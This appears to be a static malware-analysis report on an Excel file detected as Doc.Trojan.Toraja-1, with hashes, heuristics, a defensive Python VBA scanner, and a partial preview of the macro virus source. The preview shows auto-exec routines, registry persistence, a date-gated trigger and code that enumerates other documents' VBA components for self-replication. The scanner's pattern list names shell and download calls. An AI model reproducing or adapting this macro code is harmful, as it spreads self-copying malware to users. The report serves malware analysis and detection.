Doc.Trojan.Toraja-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 f492dfc29f406901…

MALICIOUS

Office (OLE)

Size: 54.0 KB
Created: 2001-05-02 19:34:33
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: d840620cf32d6c741e9fbfd632d3b741
SHA-1: 312d5dbb1847cc710e4c0c842a5798e5c663ef9c
SHA-256: f492dfc29f406901863ad502bd91f6d7d08d07d0b0fe3c3a4d376a6a333965cd
Risk Score: 300

Malware Insights

Doc.Trojan.Toraja-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Toraja-1. The high-severity heuristics flag VBA macros with Word-style auto-execution entry points (the previewed source defines AutoExec, AutoOpen and AutoNew, and the ThisWorkbook module hooks Workbook_BeforePrint), a CreateObject call, and, independently of the source text, an auto-execution token next to shell/object-execution tokens in the compiled p-code stream. The decoded source is not obfuscated: the 'Toraja12' module carries readable comments ('Toraja High Land 1998 by Marsel - Lina'), Option Explicit, and Indonesian identifiers (Serang is 'attack', Asal/Tujuan are 'source'/'destination'). What the visible portion shows is state-keeping and persistence through the VBA registry API (SaveSetting/GetSetting, which land under HKCU\Software\VB and VBA Program Settings\Application\Settings with the values FirstRun, Version, UserKeyWord and AuthorKeyWord, plus Application\AppName\Microsoft Word; these make a usable host indicator), a date-gated routine (Serang calls ShowMe once the stored FirstRun date, set to Date + 30 on first run, has passed), deferred execution via Application.OnTime, and enumeration of VBProject.VBComponents in another document (KompProject), the access path macro viruses use to copy their module into further files. This is consistent with a self-replicating macro virus rather than a downloader: no download logic appears in the previewed source, and the CreateObject call reported by the heuristics lies outside the shown portion, so its purpose cannot be confirmed from this page. Note also that Toraja12 drives the Word object model (Documents.Add, WordBasic.DisableAutoMacros, Dialogs(80), ActiveWindow.View.Type) although the carrier is an Excel workbook.

Heuristics (6)

  • ClamAV: Doc.Trojan.Toraja-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Toraja-1
  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Sub AutoOpen() is run by Word as soon as the document is opened. The previewed source also defines AutoExec (runs when Word starts or the template loads) and AutoNew (runs when a new document is created).
  • Auto_Open macro [high] OLE_VBA_AUTO
    Auto_Open is the Excel equivalent of AutoOpen; it is not in the portion of the source shown below.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject instantiates an arbitrary COM object by ProgID at run time (WScript.Shell, Scripting.FileSystemObject and the like). The call is not in the portion of the source shown below, so the object it creates is unknown from this page.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. Because it reads the compiled stream rather than the source, this heuristic still fires for p-code-only documents and for documents whose source could not be extracted or has been replaced ("VBA stomping"); in that case the p-code is what Office executes when its VBA version matches the one that compiled it, so a clean-looking decoded source does not clear the file.
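The findings above are a pattern match over the decoded VBA source: split the text into modules, locate auto-execution entry points, and look for execution capabilities near them. The block below re-implements that logic as an added example for this report; it is not the analysis platform's code, and the finding ids, severities, token list and SAMPLE_VBA are constructed for illustration (SAMPLE_VBA copies the shape of the carved source, not the sample's code). It reads the text of a carved macros.bas and returns a finding list plus a verdict that applies the same combination rule as OLE_VBA_PCODE_AUTOEXEC_EXEC, auto-exec plus an execution token.

```python
"""Static heuristics over decoded VBA source (added example; ids and token list are constructed)."""
import re

# Procedures Word/Excel invoke without a click: classic auto macros and document/workbook events.
AUTO_EXEC_PROCS = {
    "autoexec", "autoopen", "autonew", "autoclose", "autoexit",
    "auto_open", "auto_close", "document_open", "document_close",
    "workbook_open", "workbook_activate", "workbook_beforeprint",
}

# (regex, finding id, base severity): capabilities worth surfacing in macro code.
EXEC_TOKENS = [
    (r"\bCreateObject\s*\(", "VBA_CREATEOBJ", "high"),
    (r"\bShell\s*\(|\bWScript\.Shell\b", "VBA_SHELL", "high"),
    (r"\bURLDownloadToFile\b|\bXMLHTTP\b|\bWinHttpRequest\b", "VBA_DOWNLOAD", "high"),
    (r"\bVBProject\b.*\bVBComponents\b", "VBA_SELFREPLICATE", "high"),
    (r"\bSaveSetting\b", "VBA_REGISTRY_PERSIST", "medium"),
    (r"\bApplication\.OnTime\b", "VBA_TIMER_EXEC", "medium"),
]
STRONG = {"VBA_CREATEOBJ", "VBA_SHELL", "VBA_DOWNLOAD", "VBA_SELFREPLICATE"}

MODULE_RE = re.compile(r'^Attribute VB_Name = "([^"]+)"', re.M)
# (kind, name, body up to the matching End Sub / End Function)
PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(Sub|Function)\s+([A-Za-z_]\w*)\b(.*?)^\s*End\s+\1\b",
    re.M | re.I | re.S,
)


def split_modules(src):
    """Yield (module_name, module_text); olevba output concatenates modules, each led by VB_Name."""
    marks = list(MODULE_RE.finditer(src))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(src)
        yield m.group(1), src[m.start():end]


def scan_vba(src):
    """Return [(finding_id, severity, detail)] for one decoded VBA source text."""
    findings = []
    modules = list(split_modules(src))
    if modules:
        findings.append(("VBA_MACROS", "medium", f"{len(modules)} module(s) carry VBA source"))
    for mod, text in modules:
        for _kind, proc, body in PROC_RE.findall(text):
            qualified = f"{mod}.{proc}"
            auto = proc.lower() in AUTO_EXEC_PROCS
            if auto:
                findings.append(("VBA_AUTOEXEC", "high", f"{qualified} runs without user action"))
            for pattern, fid, sev in EXEC_TOKENS:
                if re.search(pattern, body, re.I):
                    # An execution token directly inside an auto-exec routine is the strongest signal.
                    sev = "critical" if auto and fid in STRONG else sev
                    findings.append((fid, sev, f"{qualified} matches {pattern}"))
    return findings


def verdict(findings):
    """Combination rule: an auto-exec entry point plus any execution capability."""
    ids = {f[0] for f in findings}
    if "VBA_AUTOEXEC" in ids and ids & STRONG:
        return "malicious"
    if "VBA_AUTOEXEC" in ids or ids & STRONG:
        return "suspicious"
    return "informational" if ids else "clean"


# Constructed test input shaped like the carved source; not the sample's own code.
SAMPLE_VBA = '''Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Private Sub Workbook_BeforePrint(Cancel As Boolean)
On Error Resume Next
If PrintOke = False Then
    Serang
    Cancel = True
End If
End Sub

Attribute VB_Name = "Example1"
Option Explicit
Public Const regApp As String = "Application"
Sub Register()
SaveSetting regApp, "Settings", "FirstRun", Format(Date + 30, "dd-mm-yyyy")
End Sub
Sub AutoOpen()
On Error Resume Next
Register
Application.OnTime Now + TimeValue("00:01:00"), "OnTimer"
End Sub
Sub OnTimer()
Dim sh As Object
Set sh = CreateObject("WScript.Shell")
End Sub
Function KompProject(Tujuan) As Boolean
Dim Komp As Variant
For Each Komp In Tujuan.VBProject.VBComponents
Next Komp
End Function
'''

if __name__ == "__main__":
    for fid, sev, detail in scan_vba(SAMPLE_VBA):
        print(f"{sev:9} {fid:22} {detail}")
    print("verdict:", verdict(scan_vba(SAMPLE_VBA)))
```

Tokens are only searched inside procedure bodies, so declarations are ignored; the call graph is not followed, which is why the OnTime target here is rated on its own body rather than as part of AutoOpen. Run it on the real macros.bas and compare the ids with the heuristics listed above.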

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 51297 bytes
SHA-256: 87f1f7f9878c4a5df4845cfcb8ee9659dff5c20cefe57e377ef17128afb6d4b8
Detection: ClamAV: Doc.Trojan.Toraja-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforePrint(Cancel As Boolean)
On Error Resume Next
If PrintOke = False Then
    Serang
    Cancel = True
End If
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Toraja12"
'Created       : Toraja High Land 1998 by Marsel - Lina
'Modified       : July 1999
'--------------------------------------------------------------
Option Explicit
Option Compare Text
Dim Komp As Variant
Public Const regApp As String = "Application"
Public Const regSecSet As String = "Settings"
Public Const regSecApp As String = "AppName"
Const TempVer As String = "Tana"
Const MacName As String = "Toraja"
Const Ver As String = "12"
Dim ctl As Variant
Global blnFound As Boolean
Dim CusProp
Dim blnMod As Boolean
Public Const TimerOn = "01:00:00"
Const Akhir = 80
Dim Caption As String
Dim actWindow
Global Active
Global Temp
Global TempPath
Dim Waktu
Dim Bar As Integer
Sub Register()
On Error Resume Next
If GetSetting(regApp, regSecSet, "FirstRun") = "" Then SaveSetting regApp, regSecSet, "FirstRun", Format(Date + 30, "dd-mm-yyyy")
If GetSetting(regApp, regSecSet, "Version") <> Ver Then SaveSetting regApp, regSecSet, "Version", Ver
If GetSetting(regApp, regSecSet, "UserKeyWord") <> MacName & Ver Then SaveSetting regApp, regSecSet, "UserKeyWord", ""
If GetSetting(regApp, regSecSet, "AuthorKeyWord") <> "Marsel" Then SaveSetting regApp, regSecSet, "AuthorKeyWord", ""
End Sub
Function Serang() As Boolean
Dim getDate As Date
On Error Resume Next
getDate = GetSetting(regApp, regSecSet, "FirstRun")
If getDate <= Date Then ShowMe
End Function
Sub AutoExec()
        Application.EnableCancelKey = 0
        Application.DisplayRecentFiles = False
        SaveSetting regApp, regSecApp, "Microsoft Word", "True"
        MenuWord
        ExportXls
        Register
        Documents.Add
        Application.OnTime Now + TimeValue(TimerOn), "OnTimer"
End Sub
Sub AutoNew()
On Error Resume Next
TempActive
ActiveWindow.View.Type = 3
End Sub
Sub AutoOpen()
On Error Resume Next
Dim strRun As String
        Application.EnableCancelKey = 0
        If PWords = False Then Application.ShowVisualBasicEditor = False
        ActiveTemp
        RemoveAll
        MenuWord
        Register
        If blnFound = True Then
            strRun = TempVer & Ver & "." & MacName & Ver & ".FoundIt"
            Application.OnTime Now + TimeValue("00:01:00"), strRun
       End If
End Sub
Function KeyWord() As Boolean
If GetSetting(regApp, regSecSet, "UserKeyWord") = MacName & Ver Then KeyWord = True
End Function
Sub FileOpen()
On Error Resume Next
    WordBasic.DisableAutoMacros 1
    Dialogs(80).Show
    TempActive
    WordBasic.DisableAutoMacros 0
End Sub
Function KompProject(Asal, Tujuan) As Boolean
On Error GoTo Salah
blnMod = False
For Each Komp In Tujuan.VBProject.VBComponents
      If Komp.Name = MacName & Ver Then blnMod = True
      If (Komp.Name <> "ThisDocument") And (Komp.Name <> "Reference To Normal") And (Komp.Name <> MacName & Ver) And _
          (Left(Komp.Name
... (truncated)